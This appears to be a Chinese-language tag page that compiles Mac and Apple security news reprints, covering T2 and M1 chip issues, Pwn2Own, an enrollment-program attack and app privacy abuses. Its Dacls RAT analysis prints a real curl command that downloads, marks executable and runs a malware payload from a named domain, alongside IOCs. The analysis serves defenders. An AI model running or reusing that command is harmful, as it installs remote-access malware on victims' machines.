标签: Mac

资深黑客确认:M1 Mac无法在离线时重置设备

在安全性问题上,苹果公司一直走在前列。人在德国的黑客、安全研究专家Jeffrey Paul日前更新博客文章,并详细介绍了对搭载T2安全芯片和M1处理器MacBook的新发现,简单来说,你无法在离线状态下对设备进行重置恢复。 他提到这意味着这些Mac对于某些场景将不再适用,比如气隙系统。 至于具体的原理是,不管你出于何种原因想要重置电脑(遭遇病毒、遭遇死机卡顿、想要卖二手等),T2和M1处理器中的安全单元也需要同步重置,而其重置的前提是拿到苹果下发的一个密钥凭证。 该密钥凭证针对绑定了Apple ID的特定硬件,需要联网从苹果服务器免费获取。这是因为,T2运行了名为BridgeOS的安全子系统,其权限和优先级高于macOS,M1处理器同样。 Paul提到几点担忧,首先是如果想要用M1做孤岛式的网络连接或者安全部署,那已经不可能。其次是,如若苹果服务器在某些国家和地区遭到限制,重置Mac变成天方夜谭。         (消息来源:cnBeta;封面来源于网络)

研究人员警告 T2 芯片存在无法修复的漏洞 导致 Mac 设备易受攻击

据悉,大多数现代 macOS 设备中使用 T2 协处理器,可负责启动和安全相关的操作,以及音频处理等不同的功能。自 2018 年起,苹果已经为自家多款基于英特尔处理器平台的 macOS 设备配备了 T2 安全芯片。然而近日有位网络安全研究人员指出,该芯片存在一个无法修复的漏洞,攻击者或借此轻易获得设备的 root 访问权限。 iMac Pro 主板特写(图自:iFixit) 据 Niels H. 所述,由于 T2 芯片基于苹果 A10 处理器,因而容易受到 iOS 设备同源漏洞攻击(checkm8)的影响。   通常情况下,如果在 DFU 模式下检测到解密调用,T2 芯片将以发生致命错误的形式退出。 但该漏洞利用程序可与 Pangu 开发的另一个漏洞配合使用,以绕过 DFU 的出口安全机制。 对于经验丰富的攻击者来说,显然可借此绕过激活锁定,并执行其它恶意攻击。 一旦被攻击者获得了对 T2 芯片的访问权限,他们将拥有完全的 root 访问和内核执行特权。 即便无法解密受 FileVault 加密保护的文件,但由于 T2 芯片管理着键盘访问,因而还是有可能被注入键盘记录器程序、并窃取用户的相关密码凭证。 固件级的密码也无法幸免,因为这部分还是要用到键盘访问。此外该漏洞或允许通过移动设备管理(MDM)和查找(Find My)功能,以绕过内置的激活锁安全机制。 MacBook Pro 系统截图(来自:Apple Support) 更糟糕的是,苹果也无法在不进行硬件修补的情况下彻底缓解该漏洞。因为出于安全的考量,T2 的基础操作系统(SepOS)是烧录在只读存储器(ROM)上的。 Niels H. 表示其已向苹果公司通报了这些问题,但尚未得到任何回应,感兴趣的朋友可到 IronPeak.be 博客上了解更多细节(传送门)。 聊以慰藉的是,即便该漏洞影响所有基于英特尔处理器和 T2 安全芯片的 Mac 产品,但相关问题并不会持久存在。 因为攻击者首先需要物理接触到用户设备,然后搭配特殊的硬件来执行,比如恶意或定制的 USB-C 线缆。 对于普通用户来说,只需牢记保持物理安全性、不插入未经验证的 USB-C 设备来规避这方面的风险。 至于最新的 Apple Silicon 平台是否也存在着同样的问题,仍有待时间去检验。     (稿源:cnBeta,封面源自网络。)

通过 Trojanized 2FA 应用程序散播 Lazarus Dacls RAT 的 Mac 新变种木马

有关研究团队最新发现了一种新的Dacls远程访问特洛伊木马(RAT)变种,它与朝鲜的Lazarus集团有关联,并且专门为Mac操作系统设计。 Dacls是2019年12月奇虎360 NetLab发现的一种针对Windows和Linux平台的全功能隐蔽远程访问特洛伊木马(RAT)。 这个Mac变种至少通过一个名为MinaOTP的木马化的macOS二元身份验证应用程序进行分发,该应用程序主要由中国用户使用。与Linux变种类似,它拥有多种功能,包括命令执行、文件管理、流量代理和蠕虫扫描。 发现 4月8日,一个名为“TiNakOTP”的可疑Mac应用程序从香港提交到VirusTotal,当时没有任何引擎检测到它。 恶意的bot可执行文件位于应用程序的“Contents/Resources/Base.lproj/”目录中,当它是Mac可执行文件时,它会伪装成nib文件(“SubMenu.nib”)。它包含字符串“c_2910.cls”和“k_3872.cls”,而这是以前检测到的证书和私钥文件的名称。 持久性 该RAT通过LaunchDaemons或LaunchAgents持久存在,它们采用属性列表(plist)文件,这个文件指定了重启后需要执行的应用程序。LaunchAgents和LaunchDaemons之间的区别在于,LaunchAgents代表登录用户运行代码,而LaunchDaemons以root用户运行代码。“ 当恶意应用程序启动时,它将在“Library/LaunchDaemons”目录下创建一个名称为“com.aex-loop.agent.plist”的plist文件,plist文件的内容在应用程序中进行了硬编码。 该程序还会检查“getpwuid( getuid() )”是否返回当前进程的用户ID。如果返回用户ID,它将在LaunchAgents目录“Library/LaunchAgents/”下创建plist文件“com.aex-loop.agent.plist”。 图1 plist文件 存储plist的文件名和目录为十六进制格式并附加在一起,它们向后显示文件名和目录。 图2 目录和文件名生成 配置文件 配置文件包含有关受害者计算机的信息,例如Puid、Pwuid、插件和C&C服务器,配置文件的内容使用AES加密算法进行加密。 图3 加载配置 Mac和Linux变种都使用相同的AES密钥和IV来加密和解密配置文件,两种变种中的AES模式均为CBC。 图4 AES密钥和IV 配置文件的位置和名称以十六进制格式存储在代码中,该配置文件名称伪装成与Apple Store相关的数据库文件:“Library/Caches/Com.apple.appstore.db”。 图5 配置文件名 “IntializeConfiguration”功能使用以下硬编码的C&C服务器初始化配置文件。 图6 初始化配置文件 通过从C&C服务器接收命令来不断更新配置文件。安装后的应用程序名称为“mina”。Mina来自MinaOTP应用程序,它是针对macOS的双因素身份验证应用程序。 图7 配置文件正在更新 主循环 初始化配置文件后,执行主循环以执行以下四个主命令: 将C&C服务器信息从配置文件上载到服务器(0x601) 从服务器下载配置文件内容并更新配置文件(0x602) 通过调用“getbasicinfo”函数(0x700)从受害者的计算机上传收集的信息 发送heartbeat信息(0x900) 命令代码与Linux.dacls完全相同。 图8 主循环 插件 此Mac-RAT拥有Linux变种中的所有六个插件,以及一个名为“SOCKS”的附加插件。这个新插件用于代理从受害者到C&C服务器的网络流量。 该应用程序会在主循环开始时加载所有七个插件。每个插件在配置文件中都有自己的配置部分,将在插件初始化时加载。 图9 加载的插件 CMD插件 cmd插件类似于Linux rat中的“bash”插件,它通过为C&C服务器提供一个反向shell来接收和执行命令。 图10 CMD插件 文件插件 文件插件具有读取、删除、下载和搜索目录中文件的功能。Mac和Linux变种之间的唯一区别是Mac变种不具有写入文件的能力(case 0)。 图11 文件插件 进程插件 进程插件具有终止、运行、获取进程ID和收集进程信息的功能。 图12 进程插件 如果可以访问进程的“ / proc /%d / task”目录,则插件将从进程获取以下信息,其中%d是进程ID: 通过执行“/ proc /%/ cmdline”获取进程的命令行参数 “/ proc /%d / status”文件中进程的名称、Uid、Gid、PPid 测试插件 Mac和Linux变种之间的测试插件的代码是相同的,它检查到C&C服务器指定的IP和端口的连接。 RP2P插件 RP2P插件是一个代理服务器,用于避免受害者与参与者的基础设施进行直接通信。 图13 反向P2P LogSend插件 Logsend插件包含三个模块: 检查与日志服务器的连接 扫描网络(蠕虫扫描仪模块) 执行长期运行的系统命令 图14 Logsend插件 该插件使用HTTP端口请求发送收集的日志。 图15 用户代理 这个插件中一个有趣的功能是蠕虫扫描程序。“start_worm_scan”可以扫描端口8291或8292上的网络子网,要扫描的子网是基于一组预定义规则确定的。下图显示了选择要扫描的子网的过程。 图16 蠕虫扫描 Socks插件 Socks插件是此Mac Rat中新增的第七个插件,它类似于RP2P插件,并充当引导bot和C&C基础结构之间通信的媒介,它使用Socks4进行代理通信。 图17 Socks4 网络通讯 此Mac-RAT使用的C&C通信与Linux变种类似,为了连接到服务器,应用程序首先建立一个TLS连接,然后执行beaconing操作,最后使用RC4算法对通过SSL发送的数据进行加密。 图18 应用程序生成的流量(.mina) 图19 TLS连接 Mac和Linux变种都使用WolfSSL库进行SSL通信,WolfSSL通过C中的TLS的开源实现,支持多个平台。这个库已被多个威胁参与者使用,例如,Tropic Trooper在其Keyboys恶意软件中使用了这个库。 图20 WolfSSL 用于beaconing的命令代码与Linux.dacls中使用的代码相同,这是为了确认bot和服务器的身份。 图21 Beaconing RC4密钥是通过使用硬编码密钥生成的。 图22 RC4初始化 变体和检测 我们还确定了此RAT的另一个变体,该变体使用以下curl命令下载恶意负载:curl -k -o〜/ Library / .mina https://loneeaglerecords.com/wpcontent/uploads/2020/01/images.tgz.001>/ dev / null 2>&1 && chmod + x〜/ Library / .mina> /dev / null 2>&1 &&〜/ Library / .mina> / dev。 我们认为,Dcals RAT的Mac变体与Lazarus小组(也称为Hidden Cobra和APT 38)有关,Lazarus小组是自2009年以来一直从事网络间谍活动和网络犯罪的臭名昭著的朝鲜恐怖组织。 据悉,该组织是最成熟的参与者之一,能够针对不同平台定制恶意软件。这个Mac-RAT的发现表明,APT小组正在不断开发其恶意软件工具集。 Mac的Malwarebytes将该远程管理木马检测为OSX-DaclsRAT。 IOCs 899e66ede95686a06394f707dd09b7c29af68f95d22136f0a023bfd01390ad53 846d8647d27a0d729df40b13a644f3bffdc95f6d0e600f2195c85628d59f1dc6 216a83e54cac48a75b7e071d0262d98739c840fd8cd6d0b48a9c166b69acd57d d3235a29d254d0b73ff8b5445c962cd3b841f487469d60a02819c0eb347111dd d3235a29d254d0b73ff8b5445c962cd3b841f487469d60a02819c0eb347111dd   loneeaglerecords[.]com/wp-content/uploads/2020/01/images.tgz.001 67.43.239.146 185.62.58.207 50.87.144.227   消息来源:malwarebytes, 译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

Malwarebytes 报告:2019 Mac 威胁检测呈上升趋势

根据 Malwarebytes 发布的 2019 威胁检测报告,今年针对 Mac 平台的威胁有上升的趋势。在排名前 25 的威胁检测中,有六种针对 Mac 平台,占总量的 16% 。尽管看似并不严重,但鉴于 Mac 用户基数只占 PC 用户群体的 1 / 12,这项发现还是不由地让我们提高了警惕。 Mac 广告软件(图自:Malwarebytes,via MacRumors) 回顾 2019 年,Mac 恶意软件首次闯入了前五,并在其中占据了两席(位列第二和第五)。 首先是被称作 NewTab 的 Mac 广告软件,其占据了跨平台检测总数的 4% 。 作为一款基于浏览器扩展程序来修改网页内容的 Adware,其可在 Chrome 浏览器中找到。 因苹果修改了扩展程序的政策,因此其无法再安装到 Safari 浏览器中。 其次是占总检测量 3% 的 PUP.PCVARK: PUP 指代‘可能不需要的程序’,是用户无意间安装的 Mac 程序的集合。 (Windows / Mac 双平台单机检测量对比) Malwarebytes 指出:2019 年,每台 Mac 检测了 9.8 次,而 Windows PC 仅为 4.2 次。 问题在于,长期以来,许多 Mac 用户以为自己并不需要防病毒软件。若悲观猜测,这些 Mac 可能已经受到了某种可疑的感染。 当然,数据仅采集自已经安装了 Malwarebytes 的设备。在现实生活中,所有 Mac 的总体威胁检测率,可能不如样本数据中那样高。   (稿源:cnBeta,封面源自网络。)

Pwn2Own 2019 黑客竞赛首日:Mac 版 Safari 浏览器再曝两个零日漏洞

本周,第 19 届 CanSecWest 安全会议正在加拿大温哥华举行,同时我们迎来了一年一度的 Pwn2Own 黑客竞赛。周三开始的竞赛中,安全研究人员 Amat Cama 与 Richard Zhu 携手,率先曝光了两个与 Mac 版 Safari 浏览器有关的零日漏洞。其成功地利用了整数堆栈溢出的暴力技术组合来逃离沙箱,获得了 5.5 万美元的奖金。 当天晚些时候,又有三位黑客(Niklas Baumstark、Luca Todesco、以及 Bruno Keith)成功地借助内核提权,攻破了 Safari 浏览器。 尽管他们展示了一套完整的访问,但只能算是部分胜利,因为据说苹果已经知晓了演示的其中一个漏洞。不过最终,他们还是拿到了 4.5 万美元的奖金。   Pwn2Own Vancouver 2019 – Day One Results(via MacRumors) 据悉,在 Pwn2Own 黑客竞赛的第一天,参与者们一共领走了 24 万美元的奖金。第二天的比赛正在进行中,期间发现的所有漏洞报告,都会提交给原公司,以便其对系统进行修补。     (稿源:cnBeta,封面源自网络。)

苹果并不绝对安全 iPhone 可能泄露企业 WiFi 密码

网易科技讯 9月27日消息,许多企业都青睐苹果设备,其中一部分原因就是苹果公司的iPhone和Mac在安全方面有着出色的表现。 就在上周,福布斯杂志透露民主党全国委员会(民主党全国委员会)正在放弃Android,转而使用iOS设备,因为人们担心在中期选举中出现黑客攻击行为。 但苹果设备并不完美。 研究人员周四声称,他们发现了一种通过苹果的产品窃取商业Wi-Fi和应用密码的新方法。 他们破解了苹果旨在帮助公司管理和保护iPhone和Mac的技术。 最近被思科以23.5亿美元收购的安全公司Duo Security的研究人员称,软件漏洞问题在于苹果的设备注册计划(DEP)的开放性。 他们发现,通过在DEP系统中注册恶意设备,可以窃取Wi-Fi密码和更多内部商业机密。 利用Apple的开放性 虽然研究人员利用了苹果的注册技术,但iPhone制造商苹果确实支持在DEP上注册iPhone时的用户身份验证。 但苹果并不绝对要求用户证明他们是谁。 这取决于使用技术的公司对实名注册是否有要求。 注册iPhone设备后,研究人员需要在独立的移动设备管理(MDM)服务器上注册在DEP上注册的iPhone,Mac或tvOS设备。 这既可以保留在硬件内部,也可以保存在公司基于云的服务中。 当使用苹果技术的公司选择不要求身份验证时,黑客可能会找到尚未在公司的MDM服务器上设置的,真实设备的已注册DEP序列号。 研究人员说,这可以通过员工的社会工程检索来获取,也可以检查人们经常发布序列号的MDM产品论坛。 最传统的“暴力破解”方法也可行,计算机可以在DEP上搜索所有可能的数字,直到它击中正确的数字,这是效率最低的一种选择。 然后,攻击者可以使用所选的序列号在MDM服务器上注册他们的恶意设备,并作为合法用户出现在目标公司的网络上。 据研究人员称,随后他们就可以检索受害者业务中的应用程序和Wi-Fi密码。 但是有一个重要的警告:攻击者必须抢在合法员工之前将他们的设备注册到公司的MDM服务器上。 因为MDM服务器每个序列号只能注册一次。 但这可能性实际上还是很大的。 本周晚些时候在布宜诺斯艾利斯举行的Ekoparty会议期间提出攻击技术的詹姆斯巴克莱(James Barclay)说,黑客可以简单地搜索过去90天内生产的所有设备的序列号。 他告诉福布斯杂志:“你找到尚未注册的设备绝对是可行的。“ 不要放弃MDM 巴克莱补充道:“总的来说,这并不意味着你不应该使用DEP或MDM。这些服务提供的好处超过了具有的风险。但苹果和客户可以采取措施来减少这种风险。” 在一篇论文中,研究人员表示,在最新的苹果iPhone和Mac设备上,苹果可以在设备芯片上使用加密技术,在注册DEP时唯一识别该设备。 他们补充说,苹果也可以采用更强大,强制性的身份验证。 巴克莱说,袭击方法是在5月向苹果报道的。 苹果没有透露是否会因研究成果而进行任何更新。 该公司在给福布斯的电子邮件中指出,这些攻击没有利用苹果产品中的任何漏洞。 发言人表示,苹果关于注册设备的说明手册是建议开启身份验证的,许多MDM提供商建议或要求采取此类安全措施。 但巴克莱认为,苹果公司将进行更新以防止此类攻击。 “我不能代表他们计划做什么,但我相信会做出一些改变。”   稿源:网易科技,封面源自网络;

macOS 应用被指偷窃和上传浏览记录 大牌开发商也不例外

当您在macOS上授予应用程序访问主目录的权限时,即使它是来自Mac App Store的应用程序,您也应该三思而后行。我们看到了一个来自著名的软件开发商趋势科技的Mac App Store应用程序,它说服用户让他们访问他们的主目录,并带有一些回报,例如免费提供病毒扫描或清理缓存,其背后的真正原因是收集用户数据 – 尤其是浏览历史记录 – 并将其上传到其分析服务器。 用户在Malwarebytes论坛和另一份报告中报告了此问题。其他研究人员随后发现,Mac App Store上“趋势科技”发布的应用程序收集并将用户的Safari、Chrome和Firefox浏览器历史记录上传到他们的服务器。该应用程序还将收集有关系统上安装的其他应用程序的信息,所有这些信息都是在启动应用程序时收集的,然后创建一个zip文件并将其上传到人员的服务器。 这款应用程序的名称叫“Dr. Unarchiver”,在使用应用程序解压缩zip文件后,它提供了“快速清理垃圾文件”选项。选择“扫描”会启动一个打开的对话框,其中选择了主目录,这就是应用程序访问用户主目录的方式,以便从浏览器中收集历史文件。在允许访问主目录后,应用程序继续收集私有数据并将其上传到他们的服务器(我们使用代理阻止了该数据)。以下是分析这款软件行为的截屏: 检查应用程序存档并分析上传到其服务器的文件,显示其确实偷窃了Safari,Google Chrome和Firefox的完整浏览器历史记录,甚至还单独保留了用户最近在Google搜索记录的单独文件以及包含所有已安装应用程序的完整列表的文件,包括有关它们是从何处下载的信息,是否是64位兼容的以及它们的代码签名。 截至今日,“Dr. Unarchiver”是美国Mac App Store中第12个最受欢迎的免费应用程序,这产生了一个巨大的隐私问题,但App Store的审核流程却并没有抓住这些做法,导致侵犯用户隐私的应用程序肆虐。虽然苹果正在通过macOS Mojave改善这种情况。   稿源:cnBeta,封面源自网络;

黑客在黑帽安全会议上展示直接入侵一台联网的全新 MacBook

苹果的设备一直被认为相当具有安全性,但是它可能并非完全如此。虽然 Windows 可能容易受到攻击,但 macOS 好像也不那么安全,例如一台全新的 MacBook 就城门大开,很容易被黑客入侵。本周在拉斯维加斯举行的黑帽安全会议上有安全专家展示了该威胁。 问题出现在针对使用 Apple 的设备注册计划及其移动设备管理平台的 MacBook 上。设计这种功能的想法主要是为了方便企业当中的设备管理:将 MacBook 直接发送给员工,以便他们可以在办公室或家中设置设备。 Fleetsmith 的首席安全官 Jesse Endahl 和 Dropbox 的工程师 MaxBélanger 发现了这些设置工具中的一个错误,可以利用它来获得罕见的远程 Mac 访问。 我们发现了一个错误,允许我们在用户第一次登录之前破坏设备并安装恶意软件。当他们登录时,当他们看到桌面时,计算机已经受到损害。 – 杰西恩塔尔 研究人员已经向苹果通报了这个漏洞,并且该公司上个月已经发布了 macOS High Sierra 10.13.6 的修复程序。但是,上个月之前制造的设备仍然容易受到攻击,组织需要更新操作系统以确保漏洞。 苹果没有评论该公司推出的错误或修复程序。   稿源:cnBeta.COM,封面源自网络;

苹果计划 2020 年在 Mac 上使用自家处理器

据彭博报道,苹果计划 2020 年开始在 Mac 上使用自己的处理器,取代英特尔的产品。受此消息影响,英特尔股价盘中大跌 9.2%,创下两年来盘中最大跌幅。英特尔收盘价报 48.91 美元,跌幅缩小为 6.07%,市值为 2283.6 亿美元。 彭博援引知情人士称,该计划的代号为 Kalamata,目前还处于早期阶段。这是一个更大计划的一部分,即让苹果的各种产品 Mac、iPhone、iPad 等无缝连接在一起。 对此消息苹果不予置评,英特尔则表示不评论有关客户的猜测。 对于两家来说,这都是一个很重要的变化。 从英特尔的角度来说,PC 处理器上英特尔最核心的业务之一,而苹果是英特尔的大客户。据彭博的供应链分析,苹果为英特尔提供了大约 5% 的年营收。如果苹果的计划落地,相当于砍掉了英特尔一笔稳定的收入。 虽然按照出货量计算,在主流 PC 制造商里苹果排在后面,但是按照收入算的话,苹果则排在第三位,凸显了苹果产品的高端地位。 彭博并援引了 Stifel 分析师 Kevin Cassidy 的看法,他认为苹果此举并不会对英特尔的营收造成太大影响,因为来自苹果的收入只占一小部分,据估计 2017 年苹果业务占英特尔总收入的比例约为 4%,利润不到 1%。因此,英特尔股价大跌属于市场反应过度。但这可能形成一个对英特尔不利的趋势,即大客户们开始设计自己的组件,弃用英特尔的产品。 而从苹果的角度来说,如果 Mac 使用苹果自己的处理器,就可以按照自己的时间表发布新品,不必受限于英特尔的排期。目前,iPhone、iPad、Apple Watch 和 Apple TV都在使用苹果设计的核心处理器。 另外,这一转变将使得苹果成为为唯一的使用自己处理器的大型 PC 制造商,惠普、戴尔、联想、华硕等公司都在使用英特尔的处理器。而这一转变将使苹果可以更快地为其产品推出新功能,从而在竞争中增添更多筹码。 通过使用自己的处理器,苹果将能够更紧密地整合新的硬件和软件,从而可能产生更好的电池使用系统——类似于使用苹果芯片的 iPad。 虽然硬件上苹果的计划从 2020 年开始,但是软件的变革将在此之前开始。苹果为 iPhone 和 iPad 配备了定制芯片,使用 iOS 系统,而搭载英特尔芯片的 Mac 则运行在 MacOS 系统上。 彭博此前报道称,为了让 Mac 更像 iPhone,苹果公司正在研发一款新的软件平台,名为 Marzipan,最早将于今年发布,用户可以在 Mac 电脑上运行 iPhone 和 iPad 应用程序。 Mac 此前还采用过基于 AMR 协处理器的系统,这个系统在某些特定功能上类似于 iOS,比如安全方面。最新的 MacBook Pro 和 iMac Pro 包括了这款处理器。据知情人士透露,苹果计划在明年推出的新版 Mac Pro 和今年计划推出的 Mac Laptop 都将采用该处理器。 稿源:凤凰网科技,封面源自网络;

iOS 11 相机二维码扫描存在漏洞 会导致用户访问恶意网站

iOS 11 中的相机 app 新增加了二维码扫描功能,可以自动识别很多内容,比如网站、App Store 链接以及 WiFi 等。上周末有用户发现,iOS 11 相机 app 存在严重的漏洞。根据 Infosec 报告,研究人员发现,iOS 11 相机 app 扫描的二维码可能欺骗用户,扫描出来的网站信息与真正前往的网站信息不同,这会导致用户访问的网站与实际看到的网站不同。 Infosec 利用这个漏洞制作了一个二维码,当用户扫描后,提示访问:facebook.com,但点开后却访问了 Infosec 自己的网站。 Infosec 认为,相机 app 不能正确的处理二维码中的 URL。自去年 9 月发布之后,iOS 11 出现了很多问题,包括影响所有 iOS 和 Mac 设备的熔断和幽灵 bug 等。Infosec 表示去年 12 月 23 日已经将二维码漏洞递交给苹果,不过截止至现在,苹果仍然没有修复这个问题。 稿源:cnBeta、MacX,封面源自网络;